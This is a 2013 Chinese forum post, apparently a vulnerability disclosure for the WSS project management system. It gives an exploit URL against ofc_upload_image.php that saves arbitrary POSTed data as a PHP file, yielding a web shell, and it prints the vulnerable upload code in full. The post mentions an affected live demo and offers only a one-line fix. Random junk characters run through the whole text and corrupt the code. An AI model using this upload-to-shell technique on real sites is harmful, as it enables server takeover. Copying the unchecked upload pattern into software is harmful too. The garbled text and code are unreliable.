标题: WSS项目管理系统Post get shell [打印本页] 作者: admin 时间: 2013-2-23 12:38 标题: WSS项目管理系统Post get shell POST 数据漏洞文件执行任意后缀文件保存 1 Z. p9 z% D& j 漏洞文件/chart/php-ofc-library/ofc_upload_image.php # n* T0 r% g1 S h* q, r # j5 L3 `- Y# m! h$ R0 E: H$ S利用:4 m" s f, r" `1 k. q
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名9 o# v# Y$ P% }8 p
! f2 W, [* n3 V
Post任意数据0 W, l1 P0 g2 N) ?
保存位置http://localhost/chart/tmp-upload-images/hfy.php' [ D& I2 z% w! R8 L
[attach]201[/attach] ) m# I0 Q" R8 V[attach]202[/attach] 1 f/ _$ K( D7 u最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~ . G( l8 E0 }, c2 z% h. s w6 Y & H$ P0 k; y% I. |) x5 M<?php 1 B' \) D F& k/ s) _3 d5 \# w6 u8 r6 ]$ u# a! q6 q& ?
//* ~2 C2 N6 ^# Y* D; i& @
// In Open Flash Chart -> save_image debug mode, you( j4 `. Z) Y* ~/ W% @
// will see the 'echo' text in a new window. - V y# N z) Y// 0 h4 I5 X! Q+ x/ ~! B8 Z8 t6 _0 `2 B1 }: n: @& Y2 P2 A$ U
/*: M: C, V- W$ y# E' m! @. j
+ I2 I! _; l8 s# W: jprint_r( $_GET );& j" M }7 R' R, g6 |7 z z
print_r( $_POST );$ `8 R" e. K5 Z
print_r( $_FILES );- i& O- M; |% ?% L P
* b* f/ k- c9 e' ~6 {* o2 E
print_r( $GLOBALS );8 u* z* ]8 Z% x% j U
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );, ]+ T2 M8 e' @# k
9 a: V! {6 d- [# g3 E*/2 |$ W1 J% C1 J, y& y3 u8 J
// default path for the image to be stored //6 i7 D; h G F* d% E# f6 Z) N7 p
$default_path = '../tmp-upload-images/'; 2 w' C1 R9 Y7 q0 C" I5 K# A! K0 M {$ w3 M, b
if (!file_exists($default_path)) mkdir($default_path, 0777, true);8 U5 X, u# C+ l
9 t. g/ u; ^1 S// full path to the saved image including filename // 1 i9 \7 G8 Y; p3 c* G7 C# K$destination = $default_path . basename( $_GET[ 'name' ] ); ( C e; h" K/ W7 ?# _
, `! `( s. J$ U) ]; q" o
echo 'Saving your image to: '. $destination;' x! z W; R& F' D, U. P4 K
// print_r( $_POST );# t" a% F) V2 c
// print_r( $_SERVER );1 ]5 ?- Q" A: I% O T% s
// echo $HTTP_RAW_POST_DATA;! C, n& c8 H1 Z8 U5 W& k
* L! T, m8 {! Q0 g7 P// 5 Q, `; y" u, ?5 q: c Y3 t5 e( W% ]// POST data is usually string data, but we are passing a RAW .png ) d% M" N% Q* @) H// so PHP is a bit confused and $_POST is empty. But it has saved% I: Q9 s+ X5 Q+ ]7 l+ O
// the raw bits into $HTTP_RAW_POST_DATA ) {+ r) ^, J+ ^; ]+ n//8 w0 v$ U) ~% `) s
( y( G% M6 _8 i V
$jfh = fopen($destination, 'w') or die("can't open file");3 o8 \" S# y* r5 ^
fwrite($jfh, $HTTP_RAW_POST_DATA); % w) \6 o8 q, n( p& T, b! |1 lfclose($jfh);+ ^- k, |9 |( P7 X7 Q
( ?8 Z O. }6 \" |//1 G2 V4 S5 x3 v9 l9 s5 P2 o' o) Q d
// LOOK: . e" v, L5 b/ T( G//, t9 h# Q) Y8 ]9 j* r
exit();, Y# P2 p4 l, a3 T/ V" p. Q: p ^ E
// % b0 X5 E! s6 X$ B- k/ @4 q5 {// PHP5:) I- B9 h$ _3 u0 H4 n, I4 ?
// / @$ f, [4 V* F) n+ ~- J7 F; z5 c) b& L& s
6 d% Y% F- K( J% W// default path for the image to be stored // 3 C; j/ Q3 y0 o% S3 k) H4 x( ]$default_path = 'tmp-upload-images/'; ; } H1 s& d+ j 6 N( {. j: V9 d$ L+ Yif (!file_exists($default_path)) mkdir($default_path, 0777, true); 0 `# Y7 [( H9 \0 m' v1 W4 Z1 K/ C7 L) u" Q+ i
// full path to the saved image including filename // |: A2 W; G( _$ e+ d$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); + p5 ~+ h4 x1 {
; Q. T3 C: `/ e: G) r/ b$ J$ I. n0 K
// move the image into the specified directory //& ^" ~! E l ]3 e- ?+ B- h
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {. u0 ~: R7 S3 e. Y; m& n
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;"; - {5 H! ~; {* b, D2 y} else { ) l) Q, s" C% }3 D' k echo "FILE UPLOAD FAILED";& g" V* [$ p# ?/ C9 Y5 O
} E" |1 u5 y: A6 v; q5 _2 a + ~& `; ~! ~" a0 | 3 f' L% h) l* k7 u# N9 @9 w8 b?>8 x& \! ]( M# V! `! R. {6 q
9 N. E9 }2 ]5 M; n0 ` 8 k' H8 r' B& e5 S* j; Z# i% i2 Y8 |: e9 f3 Q3 ~9 O
: z: a/ l+ ?6 t' }& U[attach]203[/attach] 6 @9 Q$ o. L, P1 t9 L: d: O/ \4 K1 W2 ~2 l" p% o' s
修复方案: 5 z1 A S% D5 `: [ x* Q这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 . g( N; V6 L! @ 3 M: m* M z v . Z( ^7 ^- f3 o% y8 G2 `, K* J; x$ C8 N2 F